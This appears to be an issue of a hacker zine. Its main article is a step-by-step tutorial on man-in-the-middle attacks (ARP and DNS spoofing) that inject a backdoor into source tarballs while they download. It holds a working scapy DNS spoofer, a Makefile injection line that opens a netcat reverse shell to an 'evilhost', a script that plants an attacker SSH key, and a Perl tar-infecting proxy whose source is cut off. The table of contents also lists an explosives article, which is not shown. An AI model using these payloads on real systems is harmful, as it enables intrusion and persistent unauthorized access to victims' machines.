[==============================================================================] mov al,13h ; .aware cr3w sets the correct video m0de - = === == ====] int 10h ; - = = = = === === == === == = = =========== =] Too much technology, in too little time. _..gggggppppp.._ _.go101110000010111010op._ .g1101100101000011010101001001p. .g1011001101100000100001100110101100p. .o10111001100101111101010111001110101110o. .o010011100101110000101111011010000100001100o. o0001101001100001101101000101100001010011100110o o111010110010111110000000001101101111110111011101o o11010100000110001000000101111000011010110010110001o o0010110011010000000010000100010011011000001110000111o o011110101101100000110100101010001001100110101101101100o :10011111001001010001101010110100010011111100010001011000; 1000101111010111001111001110000111010100101111101101100111 :0000110100101111101001101001011110111101010111001100000101; 111011111000000101111101001111001101000110101011011001011001 :111000100111010000111100010000110111011001110101011110000100; :101111001100100011000001111110110100101101110101101010111010; 10101011000000000111000001111111011100001110100101110010000101 11001001101010100001010110111101101011011110110011111010111011 :101001010101101111000010100010011P"' "Q111100011100101011; :001001001101010111001110010010101Y Y01010011110111010; 110001111000110100100110010100110 01010100110000111 :00010110000101111010100101010011. .0011110001011001; 10111110011000011111001001110101O O1010111110001000 :11000001100011011011011100000000o,_ _,o0010011100110010; T110101001110010000110110111000001010000000100011000010P T0110011000101011101011101000000101111111111001001000P T00110111111001010010011101110110110001110001101111P T111001010010111111010101001111000011101111000101P T1110000110010100101111001111101011000000101011P `T100100101011001110111100001101011000100011P' `T11111001011011000110000011100101010111P' "^1111011011111101010101011101111000^" "^T01001111111100111100001000P^" '""^^^T0011101011T^^^""' Welcome to .aware zine gamma! First and foremost, I'd like to apologize for not writing an article for this issue, but you've probably had enough of all that math anyway. // rattle This release contains even more "nonstandard" content than alpha and beta, but that's entirely on purpose. We're really glad that people followed the CFP and sent us the articles we can now proudly present in totally pr0n ascii. We also want to keep the content this way. It would be so very cool to see more papers on electronics, chemistry, math, or any other area of science in the zine - as long as it is both educating and entertaining. It was, of course, a pain to get articles at all. Thanks to the authors of this issue and a big get-off-your-ass to the rest of y'all. I want YOU to write a kickass paper for zine delta. But hey, fuck the foreplay. Enjoy the clit. 1 Source Tarball MITM On The Fly Merit Laas 2 Userland API Hooking S0ban 3 The BF Challenge Analysis zshzn 4 Dynamic Programming Teferi 5 Improvised Urea Nitrate Mr.X 6 outr0 rattle [==============================================================================] [----------------------[ Source Tarball MITM On The Fly ]----------------------] [==============================================================================] _.d####b._ .############. .################. .##################.__ __ __ __ _ _ __ __ ##############/´_`|#\ V V // _` | '_/ -_) ##############\__,|# \_/\_/ \__,_|_| \___| ###########>"<###### *#########( )####* ##########>.<##### by Merit Laas ################ *############* "T######T" --[ 00 ]----------------------------------------------[ Table Of Contents ]----- (1) Intro (2) MITM on a switched network (2.1) ARP spoofing (poisoning) (2.2) ICMP Redirect (2.3) DNS spoofing (2.4) More esoterik ideas (3) An example MITM (3.1) Example MITM (3.2) What this looks like on the network (3.3) How to mitigate MITM (3.4) Secure "protocol" (4) Infecting Tarballs (4.1) Necessary pieces (4.2) Example MITM pt2 (4.3) shell sessions & packet traces (5) Conclusion Appendixes: (A) network layout (B) dns spoofer --[ 01 ]----------------------------------------------------------[ Intro ]----- ( why, how and what we are going to do ) This document describes an implementation of a Man In The Middle attack. Our victim is on the same network segment with us and we know that they are likely to download one or more source tarballs to install software on their machine. We are going to try to MITM their http connection and attempt to inject a backdoor into the tarball while in flight to the victim. The idea to do this came to me during a wargame. The other team had their machine reasonably well secured in terms of packages - none had any publicly known vulnerabilities. Not wanting to just give up, I decided to target the meatware - admins are notorious for being sloppy. Who bothers to check those md5sums anyway? As this attack was intended to be used in a wargame, a bit of care has been taken for it to work in secured environments and also for it to fly under the radar. --[ 02 ]-------------------------------------[ MITM on a switched network ]----- There are at least 3 options of how to pull off an http MITM on a switched network. All of them require that the attacker somehow tricks the victim to route connections through a machine under the attacker's control. The first two methods - ARP spoofing and ICMP redirect - involve tricking the victim on the IP protocol level. The third method - DNS spoofing - requires relatively low effort and is fairly stealthy. It only requires that ARP poisoning is working to some extent. A few less likely methods are also presented for inspiration. ----( 2.1 )------------------------------------[ ARP spoofing (poisoning) ]----- ARP (Address Resolution Protocol) is used to find the link-layer address of a network address, which mostly means finding the MAC address to reach an IP. Here is an example ARP conversation: 23:58:10.127121 arp who-has 10.10.0.2 tell 10.10.0.1 23:58:10.127312 arp reply 10.10.0.2 is-at 00:23:02:9a:c3:1c The tcpdump output above pretty much sums it up: Seems that 10.10.0.1 wants to talk to 10.10.0.2 and thus asks "who has 10.10.0.2? tell 10.10.0.1!". 10.10.0.2, as a good network citizen must answer with her MAC address: "10.10.0.2 is at 00:23:02:9a:c3:1c". ARP spoofing basically means lying about your identity. The attacker has to react fast and reply the "who-has" with a fake "is-at" faster than the real owner of the IP (or - more commonly - the attacker would just flood the network with the fake answer even before the victim asks). Thus, to achieve a good position for a MITM, an attacker would tell it's victim that it is the default gateway router and tell the default gateway router it is the victim. That way, the attacker positions itself between the victim and the rest of the world, making it possible to intercept and possibly rewrite any packets passing by. However, it is possible to fix the MAC address entries in kernel to static values, which people may do if they suspect some MITM attempts are coming their way. And during wargames, everyone is very suspicious of everything. It is worth noting though, that one can only lock the ARP on a machine they manage. So, if our victim would lock the MAC of the default gateway on their box, the default gateway would still periodically resolve it's IP address with ARP. This means, that we have the possibility of hijacking the streams towards the victim, from the gateway. It is definitely possible to do a MITM rewriting only one direction of the connection, but is a bit complicated (we need to rewrite packets on the transport layer - TCP sequence numbers) and we try to avoid complexity if we can. Also, ARP spoofing may be noisy if someone is listening. ----( 2.2 )-----------------------------------------------[ ICMP Redirect ]----- ICMP redirect is meant to be sent by routers to indicate that clients should use another router to reach a particular host or network. It's use can be seen from the following commented packet trace: Client sends an ICMP echo request (ping) to another C class: 00:22:26.125017 00:01:02:03:04:05 > 05:04:03:02:01:00, ethertype IPv4 (0x0800), length 98: 192.168.128.100 > 192.168.77.5: ICMP echo request, id 29195, seq 2, length 64 The default router answers with an ICMP redirect to indicate a different router should be used for this host: 00:22:26.126918 05:04:03:02:01:00 > 00:01:02:03:04:05, ethertype IPv4 (0x0800), length 126: 192.168.128.1 > 192.168.128.100: ICMP redirect 192.168.77.5 to host 192.168.128.151, length 92 192.168.128.100 > 192.168.77.5: ICMP echo request, id 29195, seq 2, length 64 The client resolves the MAC of the new router (192.168.128.151) it is redirected to, being answered "0a:0b:0c:0d:0e:0f": 00:22:26.128944 00:01:02:03:04:05 > Broadcast, ethertype ARP (0x0806), length 42: arp who-has 192.168.128.151 tell 192.168.128.100 00:22:26.130970 0a:0b:0c:0d:0e:0f > 00:01:02:03:04:05, ethertype ARP (0x0806), length 60: arp reply 192.168.128.151 is-at 0a:0b:0c:0d:0e:0f Apparently, tries one more time with the original router 00:22:27.125001 00:01:02:03:04:05 > 05:04:03:02:01:00, ethertype IPv4 (0x0800), length 98: 192.168.128.100 > 192.168.77.5: ICMP echo request, id 29195, seq 3, length 64 Is redirected again: 00:22:27.126880 05:04:03:02:01:00 > 00:01:02:03:04:05, ethertype IPv4 (0x0800), length 126: 192.168.128.1 > 192.168.128.100: ICMP redirect 192.168.77.5 to host 192.168.128.151, length 92 192.168.128.100 > 192.168.77.5: ICMP echo request, id 29195, seq 3, length 64 This time the client complies and uses the new gateway. Notice, that the destination MAC has changed to the one that was resolved by ARP earlier: 00:22:28.125001 00:01:02:03:04:05 > 0a:0b:0c:0d:0e:0f, ethertype IPv4 (0x0800), length 98: 192.168.128.100 > 192.168.77.5: ICMP echo request, id 29195, seq 4, length 64 To redirect a victim in this way, the attacker needs to know the beginning of an original packet sent by the victim - the victim must be able to match the received redirect to a packet it knows it has sent. One way to get such a packet is initiating a connection from the outside. If the victim answers (the port is not firewalled), we get an outgoing packet from the victim sent directly to us. However, while at least the linux kernel comes with redirection enabled by default, it can be easily disabled and would probably be disabled in a wargame. Redirects are also visible it packet dumps and thus not that stealthy. ----( 2.3 )------------------------------------------------[ DNS spoofing ]----- DNS spoofing is pretty much the same idea as ARP spoofing, only at another level. When the victim makes a DNS request for a domain name, the attacker can answer with it's own IP, making the victim talk straight to the attacker - no further trickery involved. For DNS spoofing to work, we have to know when and what the victim tries to resolve in order to return a bogus answer. DNS is not sent broadcast as ARP so we can't just listen in on it. So we need to combine DNS spoofing with a little bit of ARP poisoning. Remember how we decided plain ARP poisoning wouldn't work as the victim probably has it's ARP table locked? And that the router doesn't? And that it would be complex to MITM that way? Well, it would be pretty simple if we only needed to rewrite the DNS replies that way. So what we can do is ARP poison just the router's ARP table and be on the path of arriving DNS replies - ready to rewrite them. There is a slightly theoretical issue of ambiguity when the client has resolved a number of domains via DNS and we have given a single answer to all of them. How do we know which server the client wants to connect to when it sends us a packet? For HTTP it is easy, we can use the "Host: goatporn.com" header. But if the client sends a packet to TCP port 1337? Forwarding the packet to the domain they resolved most recently may be the best option, but there is no guarantee that the packet isn't really meant for a domain resolved earlier. We could probably claim a number of IP addresses on the local network to use as a pool to identify the sites we have sent a bogus DNS answer for and forward the victim's connections based on the particular address they are connecting to. But that seems a bit complicated. IMO, the sanest decision would be to play the ignorant bliss card and just forget about it. Especially in that particular setting - the Internet connection in the wargame was pretty limited and didn't allow anything but outbound port 80 (http) requests, so the problem wouldn't even rise. You may need to consider the consequences in different setups though. ----( 2.4 )--------------------------[ More esoterik ideas (less likely ) ]----- There are a few other options listed - to spark the imagination. ----( 2.4.1 )----------------------------------------------( MAC tables )----- Switches keep track of MAC addresses connected to their ports in order to send packets only to the port where the destination is connected to. Sometimes they are willing to update their records of where a certain MAC is connected after receiving a single packet with the said MAC as source from another port. So, if we sent a packet with the router's MAC, the switch would start sending all the packets destined to the router to our box instead. Apparently, the switch thinks the router's network interface has moved to our network port. This is only temporary though, as a single packet from the router will change the MAC table back to it's original. Also, there is the problem that you need to somehow have connectivity to the Internet while you are cutting your default gateway off the network. For a MITM to work you have to be able to connect to the remote end too - otherwise there isn't anything to be Man In The Middle of. We could try to send packets to the router with the broadcast MAC and keep on flooding the network with the router's source MAC to keep the tables as we want them. It doesn't sound like a very robust solution and there's a good chance it doesn't work at all (I'm not crazy enough to try it). Alternatively, we could use another router for our Internet traffic, but that would require a second network interface in another network. It's not as implausible as it may sound, as many office-like setups have both wired and wireless connections available. ----( 2.4.2 )--------------------------------------------( Own a router )----- If you can own any machine on the victims uplink, you can redirect any traffic whichever way you wish (for most OSes). The problem with this approach is that ISP routers are most likely secured better than your average boxes and just owning them out of the blue may be implausible. Still, it's worth consideration. ----( 2.4.3 )---------------------------------( Routing protocol mayhem )----- Most routers (and switches) use various routing protocols to decide on the topology of the network and how the packets should be forwarded. For switches, it's STP, for routers on smaller network RIP, OSPF or ISIS, for internetwork routers BGP. If you can talk any of these on your network it may likely present avenues to redirect traffic the way you need. --[ 03 ]------------------------------------------------[ An example MITM ]----- "Too much showing off fancy ideas and too little command prompts and packet traces," I hear you saying? As we have decided to use the DNS spoofing approach, it seems like a good time to get our hands dirty with the Forbidden Commands (in Germany, at least). The machines we are going to use for examples are "fish" (attacker) and "chips" (victim). See appendix A for a description of the network. ----( 3.1 )------------------------------------------------[ Example MITM ]----- ( what happens, when, how, commands ) First, to meet the assumed criteria for the victim we must secure it against ARP spoofing and ICMP redirection. We can do it like this: chips:~# ip n 192.168.255.1 dev eth0 lladdr 00:ff:81:58:74:a4 REACHABLE chips:~# ip n c 192.168.255.1 dev eth0 lladdr 00:ff:81:58:74:a4 chips:~# ip n 192.168.255.1 dev eth0 lladdr 00:ff:81:58:74:a4 PERMANENT chips:~# cat /proc/sys/net/ipv4/conf/*/accept_redirects 1 1 1 1 chips:~# for f in $(ls /proc/sys/net/ipv4/conf/*/accept_redirects); do echo 0 > $f done chips:~# cat /proc/sys/net/ipv4/conf/*/accept_redirects 0 0 0 0 That done, we can move to the attacking position. First, we need to set up IP forwarding on our attacking box, so that our ARP poison doesn't cut the victim's connections to the Internet: fish:~# echo 1 > /proc/sys/net/ipv4/conf/all/forwarding fish:~# cat /proc/sys/net/ipv4/conf/all/forwarding 1 This sets the linux kernel up to forward the packets between our victim and the gateway on the network. However, we don't want to forward DNS replies as we are going to fake those: fish:~# iptables -I FORWARD -p udp --sport 53 -j DROP Then, ARP poison the router into thinking we are the victim box. We can use arpspoof for that: fish:~# arpspoof -i eth0 -t 192.168.255.1 192.168.255.134 52:54:0:12:34:5 0:ff:81:58:74:a4 0806 42: arp reply 192.168.255.134 is-at 52:54:0:12:34:5 52:54:0:12:34:5 0:ff:81:58:74:a4 0806 42: arp reply 192.168.255.134 is-at 52:54:0:12:34:5 52:54:0:12:34:5 0:ff:81:58:74:a4 0806 42: arp reply 192.168.255.134 is-at 52:54:0:12:34:5 ... Next, we set up a DNS MITM with a custom scapy script (see appendix B): fish:~# ./dnsmitm.py 192.168.255.133 52:54:00:12:34:06 And lastly, try to ping www.google.com on the victim box: chips:~# ping -c 1 www.google.com PING www.l.google.com (192.168.255.133) 56(84) bytes of data. 64 bytes from 192.168.255.133: icmp_seq=1 ttl=64 time=7.88 ms --- www.l.google.com ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 7.883/7.883/7.883/0.000 ms As you can see from the output of ping, the MITM worked and we directed the victim to our box instead of the "more official" official google servers (yep, our google server isn't official). The following piece from dnsmitm.py output describes what it did: Before: rrname : DNSStrField = 'www.l.google.com.' ('') type : ShortEnumField = 1 (1) rclass : ShortEnumField = 1 (1) ttl : IntField = 198L (0) rdlen : RDLenField = 4 (None) rdata : RDataField = '66.249.91.103' ('') After: rrname : DNSStrField = 'www.l.google.com.' ('') type : ShortEnumField = 1 (1) rclass : ShortEnumField = 1 (1) ttl : IntField = 198L (0) rdlen : RDLenField = 4 (None) rdata : RDataField = '192.168.255.133' ('') ----( 3.2 )-------------------------[ What this looks like on the network ]----- To see the whole picture, not just some imaginary command prompts, here is a (commented) packet trace from the victim machine during the ping: The victim resolves www.google.com from the router 192.168.255.1. There are no ARP queries as the router's MAC address is made permanent in kernel: 20:09:46.681723 52:54:00:12:34:06 > 00:ff:81:58:74:a4, ethertype IPv4 (0x0800), length 74: (proto: UDP (17), length: 60) 192.168.255.134.1026 > 192.168.255.1.53: 32428+ A? www.google.com. (32) The answer comes in directing to the attacker server. Notice, that also the source MAC is spoofed to be more inconspicuous: 20:09:47.186746 00:ff:81:58:74:a4 > 52:54:00:12:34:06, ethertype IPv4 (0x0800), length 494: (proto: UDP (17), length: 480) 192.168.255.1.53 > 192.168.255.134.1026: 32428 4/7/0 www.google.com. CNAME www.l.google.com., www.l.google.com. A 192.168.255.133, www.l.google.com. A 192.168.255.133, www.l.google.com. A 192.168.255.133 (452) The usual ping echo request/reply: 20:09:47.194927 52:54:00:12:34:06 > 52:54:00:12:34:05, ethertype IPv4 (0x0800), length 98: (proto: ICMP (1), length: 84) 192.168.255.134 > 192.168.255.133: ICMP echo request, id 59916, seq 1, length 64 20:09:47.206051 52:54:00:12:34:05 > 52:54:00:12:34:06, ethertype IPv4 (0x0800), length 98: (proto: ICMP (1), length: 84) 192.168.255.133 > 192.168.255.134: ICMP echo reply, id 59916, seq 1, length 64 The attacker resolving victim's MAC address by ARP: 20:09:52.230244 52:54:00:12:34:06 > 52:54:00:12:34:05, ethertype ARP (0x0806), length 42: arp who-has 192.168.255.133 tell 192.168.255.134 20:09:52.250149 52:54:00:12:34:05 > 52:54:00:12:34:06, ethertype ARP (0x0806), length 60: arp reply 192.168.255.133 is-at 52:54:00:12:34:05 The victim performs a reverse DNS query, which comes back empty: 20:09:52.256212 52:54:00:12:34:06 > 00:ff:81:58:74:a4, ethertype IPv4 (0x0800), length 88: (proto: UDP (17), length: 74) 192.168.255.134.1026 > 192.168.255.1.53: 20436+ PTR? 133.255.168.192.in-addr.arpa. (46) 20:09:52.352026 00:ff:81:58:74:a4 > 52:54:00:12:34:06, ethertype IPv4 (0x0800), length 188: (proto: UDP (17), length: 174) 192.168.255.1.53 > 192.168.255.134.1026: 20436 NXDomain* 0/1/0 (146) Of course a clever administrator would notice that they are talking to a google server which is supposedly on the local network. The attack, however, is in no way limited to the local network and we'll mount a less obvious MITM in a little while. ----( 3.3 )----------------------------------------[ How to mitigate MITM ]----- Even though we only forced the client to ping our box instead of the intended target it clearly shows that it is not that technically demanding to execute such an attack - even if some care has been taken on the OS level to make it harder. However, there is a way to make all of this impossible: by utilizing cryptography. Use https instead of http, ssh instead of telnet and check the md5sums of the files you download. Of course, for all these methods there must be a secure channel to verify the tokens - you must know whether to trust the SSL certificate, RSA key fingerprint or any particular md5sum (in fact, rattle would very much like you all to know, that you should not trust MD5 at all and possibly not SHA either). Oftentimes we are only limited to one network connection so the only available security decision is usually to blindly trust a key the first time real quick and use that key to secure any further communications. This reduces the window of opportunity for an attacker to just a few packets. However, you must not do this if the computer system REALLY must be secure. It may stop the majority of opportunistic attacks, but if you also fear a dedicated attacker who is willing to wait for their chance, they will just MITM your initial key download. Call a friend abroad and ask them to check the key id or hash over their connection. It is far less likely or plausible for an attacker to be also MITMing on the traffic of your arbitrary friends. ----( 3.3 )-------------------------------------------[ Secure "protocol" ]----- For the sake of using similar terms, We'll be calling "verifying an md5sum of your downloaded package" a "protocol". This is so that we could compare it to HTTPS and SSH without feeling stupid. Let's look at the protocol for a little: Technically, it should be hard to attack. If the md5sum of the package you are downloading is known, then you can check the known good md5sum against your downloaded package. If there's a difference, there's something wrong. There are three assumptions here though. First - it is assumed we somehow know the authentic md5sum while in reality we usually have to fetch the it on the same insecure link we are fetching the package from. If an attacker can modify the package, she can also modify the md5sum. Second - we assume that MD5 collisions are hard to find which may not be the case. Third and IMO the most fatal as it goes beyond the hash algorithm and security of the network connection - a person is expected to actually check the hash. How often do you check the hash of your downloads? I bet not that often. Verifying downloaded packages is an important aspect of a package management system for any linux distro and luckily they have got it reasonably well (afaik). The key they use to sign the packages is on an ISO so the only reasonable time to change it is while you download the ISO. If you get it via mail burned on a CD, they would have to attack the snail mail system, which is I assume is beyond all but the most determined attackers who may be more likely to threaten to cut off your body parts if you don't comply with their demands and unless you are the type that always has a few thugs hanging around because they are "generally useful", you wouldn't be worrying about those kinds of attackers. --[ 04 ]---------------------------------------------[ Infecting Tarballs ]----- Thus far we have established that there is a good chance of executing a successful MITM attack against a victim on your local network. We have reasoned that automatic schemes that use good cryptographic solutions are likely hard to crack and have decided to attack the process of fetching source packages, where the meatware has a nice opportunity to screw up by not checking the integrity of their download. ----( 4.1 )--------------------------------------------[ Necessary pieces ]----- Let's go through the process of installing a tarball. It should usually go pretty much like this: 1. admin executes wget http://good-server.com/ball.tar.gz 2. machine resolves the default gateway by ARP and vice versa 3. machine resolves 'good-server.com' by DNS 4. machine makes a HTTP request for the ball.tar.gz 5. data flows back 6. tar xzf ball.tar.gz; cd ball-1.0/ 7. ./configure; make; make install We can attack the 3rd step to point the victim to a server of our choosing. That means that at the 4th step the victim would connect to a machine under our control. We can forward the request to the right server by the Host header in HTTP/1.1 requests and thus control the 5th step - we know where to get the expected data from but are in a position to make modifications to it. Looking further along the "wget path" the most easily attacked bit seems to be either the './configure' or the 'make' part. As some packages might not contain a configure script or some admins might not call 'make install', it would be best if we could attack the 'make' part. What we would need to do is to modify the Makefile to do something naughty, preferably without any obvious side-effects. My best solution is to prepend something like this to a Makefile: ZXC := $(shell nc evilhost 12345 -e /bin/sh) And have the evilhost host a small script on 12345 that would get the username and install a ssh key for the user. Now, to actually infect a tarball, we have to change the content transmitted at step 5. In order to change it, we have to unpack the original tarball, parse the tar format, look for Makefiles in the data stream, prepend our evil variable declaration to them and repack the tarball. All of that has to happen on the fly as the victim expects the usual speedy http download. Component-wise, we need a web proxy that would do the injection part, a simple inetd server to serve the infecting shell script to our connect- back shell and of course the MITM component, which we already have (the same solution we used to redirect the ping to google). I'll use the magic of writing a paper now, and pretend that all the development work took as long as writing this sentence. ----( 4.2 )--------------------------------------------[ Example MITM pt2 ]----- ( from where we left off ) The MITM will happen in a similar setting. Only difference is, that we spoof another IP with dnsmitm (a public one, to avoid suspicion): fish:~# ./dnsmitm.py 82.131.30.120 52:54:00:12:34:06 And on that machine, 82.131.30.120 (aka "windolik"), we run our tar injecting proxy (see appendix C): windo@windolik:~/tarinject$ ./proxy.pl and on "fish", we also run a netcat that will provide an evil shell script to the rather general reverse shell we inject to the tarball (word wrapped to fit): fish:~# echo 'mkdir -p $HOME/.ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQ EAr185zP6O1tsdpj+salt4oWZX2zLIj7xjTAQL2T9t7XPuMzWrURuGT7ykWI3XG3eYec5tyzJGD z0JkzcCWF0dlT8eurl7wWbQCSFrHe30WOoSOYSQthp/t1aIjapmkDAL1tkFYTAXGN3iBnl1bsaO 8BWreBNwp2wk96XoZc+tHSPCjE6U91wjHrFUaQhw8n6WgqtUQxQbJivXjmW9YDVBs+1t7tSUteI UWMOaL5ifcaI1mysIuNlY/Dt2ArI6Wtka/+FzqEKVFnqej+QZmuIHhUP9uDwwzGB0woo1NDClyl qcaFwOVfRH9fHPAxV4aMnFqTZHiXs97YgCGRZFXEruOQ== root@fish" >> $HOME/.ssh/aut horized_keys; echo $LOGNAME; echo $USER' | nc -l -p 8000 -v -n -q 1 It installs an ssh key and reports back the username who ran it. Having done that, we can wait for the victim to decide he needs to install a package. For simplicity, I used a very small tarball that only contains a Makefile with the following contents: all: binary binary: touch binary ----( 4.3 )------------------------------[ shell sessions & packet traces ]----- To get an idea what such an attack would yield, here is a sample session from the victim's perspective: chips:~# wget http://p6drad-teel.net/~windo/jama/bla.tar.gz --00:30:16-- http://p6drad-teel.net/~windo/jama/bla.tar.gz => `bla.tar.gz' Resolving p6drad-teel.net... 82.131.30.120 Connecting to p6drad-teel.net|82.131.30.120|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [ <=> ] 221 575.52B/s 00:30:27 (575.08 B/s) - `bla.tar.gz' saved [221] chips:~# tar xzf bla.tar.gz chips:~# make touch binary chips:~# There is not much that would give away the attack if the victim does not either: * Know the right IP for p6drad-teel.net (or whichever host) by heart * Check the contents of the Makefile * Check the md5sum of the tarball The session of the attacker, installing the ssh key: fish:~# echo 'mkdir -p $HOME/.ssh; echo "ssh-rsa AAAAB3 ... listening on [any] 8000 ... connect to [192.168.255.133] from (UNKNOWN) [192.168.255.134] 3540 root root fish:~# ssh root@192.168.255.134 Last login: Tue May 13 00:15:33 2008 from 192.168.255.133 Linux clean-box 2.6.18-5-686 #1 SMP Fri Jun 1 00:47:00 UTC 2007 i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. chips:~# Therefore we see that not verifying the integrity of your downloads may have a very bad impact on your day. To have a complete overview of what is going on, here is a partial (commented) packet trace of the attack up the point of planting the ssh key (from the perspective of the victim): First, wget tries to resolve an IPv6 address (AAAA record), fails and gets the IPv4 address (A record). 00:30:16.089893 52:54:00:12:34:06 > 00:ff:81:58:74:a4, ethertype IPv4 (0x0800), length 75: (proto: UDP (17), length: 61) 192.168.255.134.1033 > 192.168.255.1.53: 55053+ AAAA? p6drad-teel.net. (33) 00:30:16.168405 00:ff:81:58:74:a4 > 52:54:00:12:34:06, ethertype IPv4 (0x0800), length 158: (proto: UDP (17), length: 144) 192.168.255.1.53 > 192.168.255.134.1033: 55053* 0/1/0 (116) 00:30:26.416774 52:54:00:12:34:06 > 00:ff:81:58:74:a4, ethertype IPv4 (0x0800), length 75: (proto: UDP (17), length: 61) 192.168.255.134.1033 > 192.168.255.1.53: 64115+ A? p6drad-teel.net. (33) 00:30:26.535107 00:ff:81:58:74:a4 > 52:54:00:12:34:06, ethertype IPv4 (0x0800), length 250: (proto: UDP (17), length: 236) 192.168.255.1.53 > 192.168.255.134.1033: 64115* 1/3/0 p6drad-teel.net. A 82.131.30.120 (208) Then it initiates a TCP connection to a machine under our control and makes the HTTP request: 00:30:26.538659 52:54:00:12:34:06 > 00:ff:81:58:74:a4, ethertype IPv4 (0x0800), length 74: (proto: TCP (6), length: 60) 192.168.255.134.2076 > 82.131.30.120.80: SYN 00:30:26.619451 52:54:00:12:34:05 > 52:54:00:12:34:06, ethertype IPv4 (0x0800), length 74: (proto: TCP (6), length: 60) 82.131.30.120.80 > 192.168.255.134.2076: SYN-ACK ... a bunch of downloading data A bit later, when the Makefile is executed, it fetches the evil shell script to execute it: 00:31:09.631978 52:54:00:12:34:06 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: arp who-has 192.168.255.133 tell 192.168.255.134 00:31:09.637132 52:54:00:12:34:05 > 52:54:00:12:34:06, ethertype ARP (0x0806), length 60: arp reply 192.168.255.133 is-at 52:54:00:12:34:05 00:31:09.637795 52:54:00:12:34:06 > 52:54:00:12:34:05, ethertype IPv4 (0x0800), length 74: (proto: TCP (6), length: 60) 192.168.255.134.3540 > 192.168.255.133.8000: SYN 00:31:09.645537 52:54:00:12:34:05 > 52:54:00:12:34:06, ethertype IPv4 (0x0800), length 74: (proto: TCP (6), length: 60) 192.168.255.133.8000 > 192.168.255.134.3540: SYN-ACK --[ 05 ]--------------------------------[ Conclusion: check those MD5sums ]----- For the short conclusion: check the md5sums or sha1sums or whichever hashes of those downloads. While it is possible to construct blobs with the same md5 hashes, it is still relatively hard to find a collision without specially preparing the packages first, definitely hard to do on the fly. And whenever possible (like when remotely administrating a machine), use different links for downloading and hash verification. Also keep in mind, that while digital signatures and CA's and so forth are cool, doing something like: gpg --recv-keys KEYID can be easily intercepted by an attacker on your local network. Choosing to trust a new SSL certificate is just as dangerous. For the more general conclusion: be conscious of the fact that a human on your system can easily break all security. Always think of how you could screw up in your every-day work and avoid doing it. ---[ Appendix A ]----------------------------------------[ network layout ]----- The machines in use for the examples are "fish" and "chips": fish: IP: 192.168.255.133 chips: IP: 192.168.255.134 A bit less important machines: router: IP: 192.168.255.1 windolik: IP: 82.131.30.120 "fish" and "chips" are set up in a same network segment together with a router that connects them to the rest of the world: /----------\ | windolik | \----------/ | THE INTERNET | /----------\ | router | \----------/ | /----------\ | SWITCH | \----------/ | | /------\ /-------\ | fish | | chips | \------/ \-------/ "fish" and "chips" are virtual, emulated by QEMU, as is the switch, emulated by vde_switch of VDE (Virtual Distributed Ethernet). "windolik" is a real machine on the Internet. All machines run a version of Debian Linux. ---[ Appendix B ]-------------------------------------------[ dns spoofer ]----- #!/usr/bin/python from scapy import * import sys if len(sys.argv) != 3: print "Usage: dnsmitm.py " # the answer to all DNS queries spoofit = sys.argv[1] # the real mac of our victim realmac = sys.argv[2] # mitm loop while True: # get a dns packet packet = sniff(count=1, lfilter=lambda x: x.haslayer("UDP") and \ x.getlayer("UDP").sport == 53)[0] #ls(packet) # TODO: for HTTP/1.0 requests (without Host:), write this someplace our # webmitm can use as a last resort originalhost = packet.qd.qname # rewrite the answer #print "Before: " #ls(packet.an) an = packet.an while an: # domain names end in "." if an.rdata[len(an.rdata)-1] != "." and an.type == 1: an.rdata=spoofit an = an.payload #print "After: " #ls(packet.an) # modify hw-dst packet.dst = realmac # needed to calculate the correct checksums packet.getlayer("UDP").chksum=None packet.getlayer("IP").chksum=None packet.getlayer("UDP").len=None packet.getlayer("IP").len=None # pass the modified answer print "spoofed one!" sendp(packet) Appendix C - tar infector source #!/usr/bin/perl use HTTP::Daemon; use HTTP::Status; use Net::HTTP; use POSIX; use IPC::Open2; use IO::Select; use Time::HiRes qw( usleep ); # infector BEGIN { my $uncompr_sel, $uncompr_pid, $uncompr_out, $uncompr_in; my $compr_sel, $compr_pid, $compr_out, $compr_in; my $c, $inject, $tarbuf, $tarofs, $tarskipto; my $injecting; # added to makefiles # adds new pseudotarget, can run in background # runs a shell expansion, can't go into background AFAIK my $evilcode = "XKCD := \$(shell nc 192.168.255.133 8000 -w 1 -e /bin/sh)\n"; # setup the pipes sub init_inject { # connection to client (victim) $c = shift; # URI being downloaded $uri = shift; # for gzipped tar if ($uri =~ /tar\.gz$/ || $uri =~ /tgz$/) { print "Opening compressors: GZIP\n"; $uncompr_pid = open2($uncompr_in, $uncompr_out, "gunzip"); $uncompr_sel = IO::Select->new($uncompr_in); $compr_pid = open2($compr_in, $compr_out, "gzip -f -"); $compr_sel = IO::Select->new($compr_in); $inject = 1; print "Opened compressors\n"; } # for bzip2d tar elsif ($uri =~ /tar\.bz2$/) { print "Opening compressors: BZIP2\n"; $uncompr_pid = open2($uncompr_in, $uncompr_out, "bunzip2"); $uncompr_sel = IO::Select->new($uncompr_in); $compr_pid = open2($compr_in, $compr_out, "bzip2 -f -"); $compr_sel = IO::Select->new($compr_in); $inject = 1; print "Opened compressors\n"; } # else, just pass it through else { $inject = 0; } # some internal variables for housekeeping while modifying the tar # how far along in the archive are we $tarofs = 0; # offset of the next file header $tarskipto = 0; # used to collect a full tar block (512 bytes) $tarbuf = ""; # wether we are currently injecting $injecting = 0; } sub end_inject { if ($inject) { print "Closing compressors\n"; close($uncompr_out); # allow for the uncompressor to uncompress the last buffer usleep(200000); handle_injection(""); close($uncompr_in); close($compr_out); usleep(200000); handle_injection(""); close($compr_in); print "Closed compressors\n"; } } sub inject_tar { # a block tar my $buf = shift; my $retbuf = ""; # 3 buffers are used here # $buf - input buffer, read 512 bytes at a time # $tarbuf - used to keep leftovers until we have full 512 bytes # $retbuf - what we return to client, 512 bytes. 1024 bytes when we just # injected # read the input buffer block by block while (length($buf) > 0) { # if we have less than a block, store it and wait for more if (length($buf) + length($tarbuf) <= 512) { $tarbuf .= $buf; $tarofs += length($buf); $buf = ""; last; # else, take a block for injection } else { my $subset = 512 - length($tarbuf); $tarofs += $subset; $tarbuf .= substr($buf, 0, $subset); $buf = substr($buf, $subset, 999999); } # contents of a the file are passed through if ($tarofs != $tarskipto + 512) { $retbuf 